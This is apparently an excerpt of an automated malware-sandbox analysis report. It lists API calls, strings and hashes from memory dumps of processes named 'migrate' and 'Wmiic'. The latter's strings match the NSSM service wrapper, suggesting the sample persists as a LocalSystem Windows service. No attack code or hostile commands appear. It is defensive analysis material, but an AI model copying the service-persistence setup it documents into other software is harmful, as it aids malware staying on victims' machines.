                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                                                                                                    • Opcode ID: 261da06c808a7d1645da6ab70b25f813eaa43de7090e154315ae1ed51f8ca977
                                                                                                                                                                                                    • Instruction ID: 3cf1ef6c2778d2b86e34fd758afaf278fa4b5f5da2a7400553f05693e9d94f3d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 261da06c808a7d1645da6ab70b25f813eaa43de7090e154315ae1ed51f8ca977
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0301F56350831179DA386B759CC2DABA7ACEFA57B0B50442EF554D7082FB30D88182F1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • VirtualQuery.KERNEL32(80000000,0012E5E8,0000001C,0012E7DD,00000000,?,?,?,?,?,?,?,0012E5E8,00000004,00171CEC,0012E86D), ref: 0012E6B4
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0012E5E8,00000004,00171CEC,0012E86D), ref: 0012E6CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                                                                                                    • Opcode ID: afd7b290c6a7fbe869775cf9e42c1d7b1f2bb52f0640e53ba9390497ea21646b
                                                                                                                                                                                                    • Instruction ID: ddb662b921165f3f2b2286ceeddc88ff727bc858db3ed5fe7e298daa088eed1b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: afd7b290c6a7fbe869775cf9e42c1d7b1f2bb52f0640e53ba9390497ea21646b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7901F736A001196BDB14DE29DC09BDD7BEAAFC4324F0CC120ED19D7150D734D9558680
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: _swprintf.LIBCMT ref: 0011E30E
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: _strlen.LIBCMT ref: 0011E32F
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: SetDlgItemTextW.USER32(?,0014E274,?), ref: 0011E38F
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: GetWindowRect.USER32(?,?), ref: 0011E3C9
                                                                                                                                                                                                      • Part of subcall function 0011E2E8: GetClientRect.USER32(?,?), ref: 0011E3D5
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 2622349952-4108050209
                                                                                                                                                                                                    • Opcode ID: f9e873468616ed9c92bfcdf97761013e817041d814f63f6f5e416dacc23ccc97
                                                                                                                                                                                                    • Instruction ID: 2853d00df38d47b39b2f2dfc0db7ab2aa31ed9424468bb59b3ca099dfd7d6255
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9e873468616ed9c92bfcdf97761013e817041d814f63f6f5e416dacc23ccc97
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3F04430114288B6DF1D1F508C1D7EA7BA9BF54355F044234FE68559E9CB74C9D4EA50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00121101,?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FEA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FF6
                                                                                                                                                                                                      • Part of subcall function 00116C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00116C54
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00120FFF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                                                                                                    • Opcode ID: ff19ac6474ac048b15fc7dea127d296e95e55776a5d8b190564351512dfa05cb
                                                                                                                                                                                                    • Instruction ID: 6de4ae774ecfe78b37b8e65ff6bf878589a55ea9226f1d6d2d3ae4fadb7093f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff19ac6474ac048b15fc7dea127d296e95e55776a5d8b190564351512dfa05cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19D02E725085307BC6203324AC0AEAE3814AB32732B200724F038662F2CB220AC192E2
APIs
• GetModuleHandleW.KERNEL32(00000000,?,0011DA55,?), ref: 0011E2A3
• FindResourceW.KERNEL32(00000000,RTL,00000005,?,0011DA55,?), ref: 0011E2B1
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: FindHandleModuleResource
• String ID: RTL
• API String ID: 3537982541-834975271

Execution Graph

Execution Coverage: 5.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.1%
Total number of Nodes: 735
Total number of Limit Nodes: 45
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: CloseDelete
• String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppKillProcessTree$AppNoConsole$AppParameters$AppPriority$AppRedirectHook$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateDelay$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStderr$AppStdin$AppStdout$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$AppTimestampLog$Application$CopyAndTruncate$CreationDisposition$FlagsAndAttributes$ShareMode
• API String ID: 453069226-2212462884
• Opcode ID: d6f40d484542d60e602315e057a830b834a1cf69aa439974fe36276ad11cd41d
• Instruction ID: 5f1e44c56ca19a9d09426f40c55942bea94d1b5e1f951be96c332341e708dae6
• Opcode Fuzzy Hash: d6f40d484542d60e602315e057a830b834a1cf69aa439974fe36276ad11cd41d
• Instruction Fuzzy Hash: 27524AB5214B4281FA66DB27B841BE93361B74D7D8F84512BBF0A076B5DF78CA48C720

Control-flow Graph
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: ConsoleWindow$Process$FileHandleModuleNameOutputPathQuoteSpaces$AllocCtrlCurrentDispatcherErrorLastServiceStartStationThread_snwprintf_s
• String ID: %s %s %s %s$2.24-101-g897c7ad$2017-04-26$64-bit$NSSM$continue$dump$edit$get$install$list$pause$processes$remove$reset$restart$rotate$set$start$status$statuscode$stop$unset
• API String ID: 3367203220-1867080860
• Opcode ID: 0cc89f18b1057b5a72a2ee583f9768e88b6792957dfbdf81a853be53e10b8232
• Instruction ID: 475713a89709ce93db3c9404fee735fe112960effc50d923b9116429dcfb75de
• Opcode Fuzzy Hash: 0cc89f18b1057b5a72a2ee583f9768e88b6792957dfbdf81a853be53e10b8232
• Instruction Fuzzy Hash: F1E16CB0600A4686FB16FB73F9657E923A1EB497D8F404426BB194B2F6EF78C945C340

Control-flow Graph
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: __doserrno_errno
• String ID: U
• API String ID: 921712934-4171548499
• Opcode ID: 74c5f7fb8baae198cacb24aad5bbcbe68e136ebc3b0815143d4b2bb7719c7451
• Instruction ID: 76fb5729cbaa013820f51bb000bfef4f3fcad7bac76d669b73782e902e55697a
• Opcode Fuzzy Hash: 74c5f7fb8baae198cacb24aad5bbcbe68e136ebc3b0815143d4b2bb7719c7451
• Instruction Fuzzy Hash: 3712023220478586EB228F66E4443EEB7A1F38CBC4F55411AFB8947AB6DB3DD945CB00

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$AllocProcess_snwprintf_s
• String ID: LocalSystem$canon$edit_service()
• API String ID: 3659976305-2564672073
• Opcode ID: c2f84ec46b8393c74ca8ca84993f5637c0292e65ffba0c481b9bd538b89089a5
• Instruction ID: e3b5c0a1dd0221c7c68a33bde828070b828dc71daee6d23759004c629932d6ba
• Opcode Fuzzy Hash: c2f84ec46b8393c74ca8ca84993f5637c0292e65ffba0c481b9bd538b89089a5
• Instruction Fuzzy Hash: ACA17E72204B8192EB26DB22E4443DA73A1F788BD4F444126FB99477A5DF39C965C700

Control-flow Graph (graph not rendered)

Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3fecfab8ebf54e75fb7e5ea40beadd711431b0205b0aaf5941a53d812bb5c10a
• Instruction ID: 7bc4927bec7be680e73558176a6a3dd42dc0bfe2cbad2d4f784c91d458048ab8
• Opcode Fuzzy Hash: 3fecfab8ebf54e75fb7e5ea40beadd711431b0205b0aaf5941a53d812bb5c10a
• Instruction Fuzzy Hash: 02416D71204A8086E766EB22F4453DE73A4FB88BD0F544125FBAE87BA6EF3DC5558700

Control-flow Graph (graph not rendered)

APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Event$Source$CreateDeregisterErrorLastRegisterReport_snwprintf_s
• String ID: EventMessageFile$NSSM$SYSTEM\CurrentControlSet\Services\EventLog\Application\%s$TypesSupported$create_messages()$eventlog registry
• API String ID: 3915943028-129066941
• Opcode ID: 38f3f3b6c8bfc54d669350a2e0a1a664d129324a3bdfb289b21d3487b642f25c
• Instruction ID: 65ade5d21c82d8a5f2cf4e8821feba2f506391910815b1a365cbf720ff84dd66
• Opcode Fuzzy Hash: 38f3f3b6c8bfc54d669350a2e0a1a664d129324a3bdfb289b21d3487b642f25c
• Instruction Fuzzy Hash: 0E416271204B8186E721CB62F4917DA73A5F78C7A4F404315F79947AA8DB3CC509CB00

Control-flow Graph (graph not rendered)

APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Event$Source$CreateDeregisterErrorLastRegisterReport_snwprintf_s
• String ID: AppExit$NSSM_REG_EXIT$create_exit_action()
• API String ID: 3915943028-2079778180
• Opcode ID: 72daa3fbc5d415ad54047c881a5534a5db6ebd6bceb6f11fdf2c9258942a3b44
• Instruction ID: ccaac05e6ae8247f9b9043b8869667f207f6f4575daf8edcbf1287825eb9e7ed
• Opcode Fuzzy Hash: 72daa3fbc5d415ad54047c881a5534a5db6ebd6bceb6f11fdf2c9258942a3b44
• Instruction Fuzzy Hash: E6415F71208B8186EB61CB62F8857DAB3A5F78C794F440226BB9D43BA9DF78C545CB00

Control-flow Graph (graph not rendered)

APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: DecodePointer$_initterm$ExitProcess_lock
• String ID:
• API String ID: 2551688548-0
• Opcode ID: 6175295708fc991cf33cc86d77c261edfb25d46c176234fe335448c5724ce638
• Instruction ID: c03ffe64fd4b435e30c5ae8a24083b9de1078ef0a929f37934195ca75bf9864d
• Opcode Fuzzy Hash: 6175295708fc991cf33cc86d77c261edfb25d46c176234fe335448c5724ce638
• Instruction Fuzzy Hash: 6F416D31216A9085FA539B17F8443D96295F78C7C4F144429FB4D4B7BAEF3AC992C740

Control-flow Graph (graph not rendered)

APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: FormatHeapMessage$AllocDefaultProcessUser_snwprintf_s
• String ID: system error %lu
• API String ID: 3536280399-1824642319
• Opcode ID: aaa1bbfdd9c70fa5ff9d64c30cbb850859592f88a9e14e0967e5c3d2bea55925
• Instruction ID: 8ac30a1a1620e7ed145e822f26d1194f441ec5727b48fbd65988fd17af8cf97c
• Opcode Fuzzy Hash: aaa1bbfdd9c70fa5ff9d64c30cbb850859592f88a9e14e0967e5c3d2bea55925
• Instruction Fuzzy Hash: 60118271614B8182E721DF62F814796B791FB8C7A9F004238AB9943BE4EF3CC5488B00

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: __doserrno_errno
• String ID:
• API String ID: 921712934-0
• Opcode ID: 8d9561d498963158f19ad26a3a68302db72698de20c15f67894f9640bdee3b33
• Instruction ID: 0ddb69c9fbd17f45a9d6bfcdc64467eb0070a41d15bfb506f601218df6432c84
• Opcode Fuzzy Hash: 8d9561d498963158f19ad26a3a68302db72698de20c15f67894f9640bdee3b33
• Instruction Fuzzy Hash: 8831CF32A1025086F3135FB7A8427DE7659A7C9BE0F594619FB254B7F2CB39C8128B04

Control-flow Graph

APIs
  • Part of subcall function 0000000140010290: GetProcessHeap.KERNEL32(?,?,?,?,?,0000000140004171), ref: 0000000140010296
  • Part of subcall function 0000000140010290: HeapAlloc.KERNEL32(?,?,?,?,?,0000000140004171), ref: 00000001400102AA
• _snwprintf_s.LIBCMT ref: 0000000140013B41
• _snwprintf_s.LIBCMT ref: 0000000140013BC9
  • Part of subcall function 00000001400026B0: _vfwprintf_p.LIBCMT ref: 00000001400026E1
  • Part of subcall function 00000001400026B0: LocalFree.KERNEL32(?,?,?,00000000,0000000140001065), ref: 00000001400026E9
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap_snwprintf_s$AllocFreeLocalProcess_vfwprintf_p
• String ID: pre_install_service()$service
• API String ID: 3309010533-3337766052
• Opcode ID: a4fe2850516496a6d6bef16b651254128269590410b47283ba75cfab8d25e80a
• Instruction ID: 1f3a638b6378999b6819d25118dd32754412a06506d8dd69f99bcf8c10b9a7c2
• Opcode Fuzzy Hash: a4fe2850516496a6d6bef16b651254128269590410b47283ba75cfab8d25e80a
• Instruction Fuzzy Hash: 9051C272614A8582EA12EB26E4013DA6365F7487F4F455322BFBA5B7E6DF39C542C300

Control-flow Graph (function at 140019ff0; Executed / Not Executed legend and raw edge list omitted)

APIs
• GetStartupInfoA.KERNEL32 ref: 000000014001A015
  • Part of subcall function 000000014001A34C: Sleep.KERNEL32(?,?,?,000000014001C657,?,?,00000000,000000014001B8C5,?,?,?,?,0000000140018C63), ref: 000000014001A391
• GetFileType.KERNEL32 ref: 000000014001A192
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: FileInfoSleepStartupType
• String ID:
• API String ID: 1527402494-0
• Opcode ID: 3f51e10bc0a05a402e61eb3b2245a11eee57e2e3cb1c958024df1f49150fad7b
• Instruction ID: 7a3fca090f6ba9f5ab9e1a2497757437a20a6ef231ed88d5b265d648ccddedd5
• Opcode Fuzzy Hash: 3f51e10bc0a05a402e61eb3b2245a11eee57e2e3cb1c958024df1f49150fad7b
• Instruction Fuzzy Hash: 3F916F31604A8085E7528B2AD84879937A5F30B7F4F658B25EB794B3F1DB7EC886C311

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: CommandInitializeLine_cinit
• String ID:
• API String ID: 2063639010-0
• Opcode ID: 334057000040a9cd6d33974f80b254a5e394fd5272b937c64bc8013a74fed007
• Instruction ID: 49bd52d0a6cb84c4fc261c0c752a8ca64d3d73b004f0ff5055fbb52a34e6a74c
• Opcode Fuzzy Hash: 334057000040a9cd6d33974f80b254a5e394fd5272b937c64bc8013a74fed007
• Instruction Fuzzy Hash: 6B41113160474186F763ABA7A4913E932A1AB9D3C4F54043DBB458F2F7DB3AC941C711

Control-flow Graph (function at 140010290; Executed / Not Executed legend and raw edge list omitted)

APIs
• GetProcessHeap.KERNEL32(?,?,?,?,?,0000000140004171), ref: 0000000140010296
• HeapAlloc.KERNEL32(?,?,?,?,?,0000000140004171), ref: 00000001400102AA
  • Part of subcall function 00000001400025F0: RegisterEventSourceW.ADVAPI32 ref: 0000000140002613
